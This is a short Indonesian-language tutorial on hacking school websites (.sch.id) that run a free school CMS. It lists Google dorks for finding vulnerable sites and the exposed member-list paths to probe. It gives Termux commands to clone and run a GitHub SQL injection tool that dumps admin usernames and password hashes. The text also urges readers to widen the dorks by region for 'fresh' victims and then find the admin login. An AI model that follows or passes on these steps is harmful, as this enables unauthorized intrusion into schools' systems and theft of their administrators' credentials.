Pertama cari target dulu yah, gaada target apa yang mau di eksekusi sayang:v santuy dah disiapin dorknya kok hehe, ngedork dulu yegan
Dork :
intext:"Setup by Website Sekolah Gratis." Ulangan Site:sch.id
intext:"Setup by cmssekolahku." cbt site:sch.id
intext:"Setup by Website Sekolah Gratis." rudi site:sch.id
intext:"Setup by Website Sekolah Gratis." guru bahasa site:sch.id
Kembangin lagi ea bujank, okeh kalau udh dapat tambahin exploitnya
Exploit :
users/listmemberall.php
member/listmemberall.php
Kalau vuln, tandanya gini, blank putih ea gan
Lanjut kalau udah nemu yang seperti diatas kita exploit lewat termux, install dulu toolnya
$ pkg install git; pkg install php
Jika sudah kita clone tool exploitnya dari reponya
$ git clone https://github.com/Afrizall/balitbang-sqli-post-data
Lalu buka foldernya dan jalankan toolnya sekaligus masukan targetnya, berikut perintahnya
$ php balitbang.php https://target.url/exploit
Kalau work bakal muncul user sekaligus password adminya yang masih dalam bentuk hash
Okeh tutorialnya udah selesai sebenarnya, kalian tinggal cari login adminya saja ea bujank:* untuk dork silahkan kembangkan lagi dengan menambahkan nama kota, kabupaten atau daerah tertentu agar kalian bisa mendapatkan target yang fresh alias perawan:v buat yang failed saat exploit, kalian bisa gunakan tool martabak balitbang.
martabak SQLi balitbang tool : exploit SQLi balitbang
spesial thanks to : Afrizal - ./N4zi404_ - ./botkiller - Junx$care
